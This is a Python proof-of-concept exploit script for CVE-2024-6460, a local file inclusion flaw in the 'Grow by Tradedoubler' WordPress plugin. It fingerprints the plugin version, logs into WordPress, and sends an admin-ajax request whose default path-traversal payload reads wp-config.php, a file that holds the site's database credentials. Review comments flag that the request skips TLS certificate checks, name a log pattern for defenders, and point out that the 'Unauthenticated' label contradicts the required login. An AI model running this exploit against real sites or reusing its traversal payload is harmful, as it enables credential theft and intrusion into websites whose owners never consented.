POC / CVE-2024-6460.py PY
import argparse
import requests
import re

# By Nxploit Khaled_alenazi

# Silences urllib3's warnings, including the InsecureRequestWarning emitted for
# requests made with verify=False. This only hides the warning: certificate
# validation itself is switched off by the verify=False arguments used below.
requests.packages.urllib3.disable_warnings() # Suppress urllib3 warnings about unverified TLS requests

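def url_check_version(url):
    """Report whether the plugin version published under *url* is in the affected range.

    Fetches the plugin's ``readme.txt``, extracts a ``Version: X.Y.Z`` string and
    compares it numerically with 2.0.21, the newest release this script treats
    as affected.

    Args:
        url: Base URL of the WordPress site; the readme path is appended as-is.

    Returns:
        True when a version was found and is <= 2.0.21. False when the version
        is newer, when no version string was found, or when the request failed.
    """
    version_url = url + '/wp-content/plugins/tradedoubler-affiliate-tracker/readme.txt'
    try:
        # verify=False skips TLS certificate validation, so the response is not
        # authenticated. The timeout keeps an unresponsive host from hanging the run.
        response = requests.get(version_url, verify=False, timeout=10)
        response.raise_for_status()
    except requests.RequestException as e:
        print(f"Error accessing {version_url}: {e}")
        return False

    # NOTE(review): WordPress plugin readme files usually declare the release as
    # "Stable tag:"; confirm that "Version:" really appears in this plugin's
    # readme, otherwise every site is reported as "not found".
    match = re.search(r'Version:\s*(\d+\.\d+\.\d+)', response.text)
    if not match:
        print("Version information not found.")
        return False

    version = match.group(1)
    print(f"Found version: {version}")

    # Compare as integer tuples. A plain string comparison orders versions
    # lexically ('2.0.3' > '2.0.21', '10.0.0' < '2.0.21') and misclassifies them.
    if tuple(int(part) for part in version.split('.')) <= (2, 0, 21):
        print("The site is vulnerable.")
        return True

    print("The site is not vulnerable.")
    return False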

def login_to_wordpress(session, url, username, password):
    """Submit the WordPress login form on *session* and report whether it worked.

    Args:
        session: HTTP session object; its ``post`` method and ``cookies`` are used.
        url: Base URL of the WordPress site; ``/wp-login.php`` is appended.
        username: Value sent in the ``log`` form field.
        password: Value sent in the ``pwd`` form field.

    Returns:
        True when the session holds a cookie whose name contains
        ``wordpress_logged_in`` after the request, False otherwise.
    """
    form_fields = {
        'log': username,
        'pwd': password,
        'rememberme': 'forever',
        'wp-submit': 'Log+In'
    }
    browser_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"}

    # verify=False: the credentials are sent without validating the server's
    # certificate, so an on-path party could read them. The response body is
    # not inspected; only the cookie jar is checked afterwards.
    session.post(url + '/wp-login.php', verify=False, data=form_fields, headers=browser_headers)

    logged_in = False
    for cookie in session.cookies:
        if 'wordpress_logged_in' in cookie.name:
            logged_in = True
            break

    if not logged_in:
        print("Failed to log in.")
        return False

    print("Logged in successfully.")
    return True

def exploit_ajax(session, url, component):
    """POST the ``tm_load_data`` AJAX action with *component* and print the outcome.

    The request goes to ``/wp-admin/admin-ajax.php`` on an already logged-in
    *session*. Nothing is returned; the result is only printed.

    For defenders: the traffic this produces is a POST to ``admin-ajax.php``
    with ``action=tm_load_data`` and a ``component`` value, which in the
    script's default contains ``../`` sequences. Such requests are worth
    alerting on in web-server or WAF logs.

    Args:
        session: HTTP session object whose ``post`` method sends the request.
        url: Base URL of the WordPress site.
        component: Value sent in the ``component`` form field.
    """
    endpoint = url + '/wp-admin/admin-ajax.php'
    form = {'action': 'tm_load_data', 'component': component}
    request_headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0",
        "Accept": "application/json, text/javascript, */*; q=0.01",
        "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
        "X-Requested-With": "XMLHttpRequest",
        # NOTE(review): the Referer hard-codes a '/wordpress' path prefix that the
        # other URLs in this file do not use; it only matches sites installed
        # under that subdirectory.
        "Referer": url + '/wordpress/wp-admin/profile.php',
        "Origin": url
    }

    response = session.post(endpoint, data=form, headers=request_headers, verify=False)

    # NOTE(review): HTTP 200 is the only criterion for the "successful" message.
    # The body is never inspected, so a 200 does not show that any file content
    # came back.
    if response.status_code != 200:
        print(f"Exploit failed with status code: {response.status_code}")
        return

    print("Exploit successful! Response:")
    print(response.text)

def main():
    """Parse the command line, then run the version check, login and AJAX request.

    The flow stops after the version check when the site is not reported as
    affected, and exits when the login fails.
    """
    # NOTE(review): the description says "Unauthenticated", yet a username and
    # password are mandatory and a login happens before the AJAX request.
    # Per the same description, releases below 2.0.22 are affected, so the
    # remediation is upgrading the plugin to 2.0.22 or later.
    cli = argparse.ArgumentParser(description="Grow by Tradedoubler < 2.0.22 - Unauthenticated LFI")
    option_specs = (
        (('-u', '--url'), {'required': True, 'help': "Target WordPress site URL (e.g., http://example.com)"}),
        (('-U', '--username'), {'required': True, 'help': "WordPress username"}),
        (('-P', '--password'), {'required': True, 'help': "WordPress password"}),
        (('-c', '--component'), {'default': '../../../../../wp-config.php', 'help': "Path to the target file (default: wp-config.php)"}),
    )
    for flags, options in option_specs:
        cli.add_argument(*flags, **options)
    opts = cli.parse_args()

    affected = url_check_version(opts.url)
    if not affected:
        return

    # One session carries the login cookies to the follow-up request; TLS
    # certificate validation is disabled for everything sent through it.
    http = requests.Session()
    http.verify = False

    authenticated = login_to_wordpress(http, opts.url, opts.username, opts.password)
    if not authenticated:
        exit()

    exploit_ajax(http, opts.url, opts.component)

# Run the command-line flow only when the file is executed as a script, so
# importing the module has no side effects beyond the definitions above.
if __name__ == "__main__":
    main()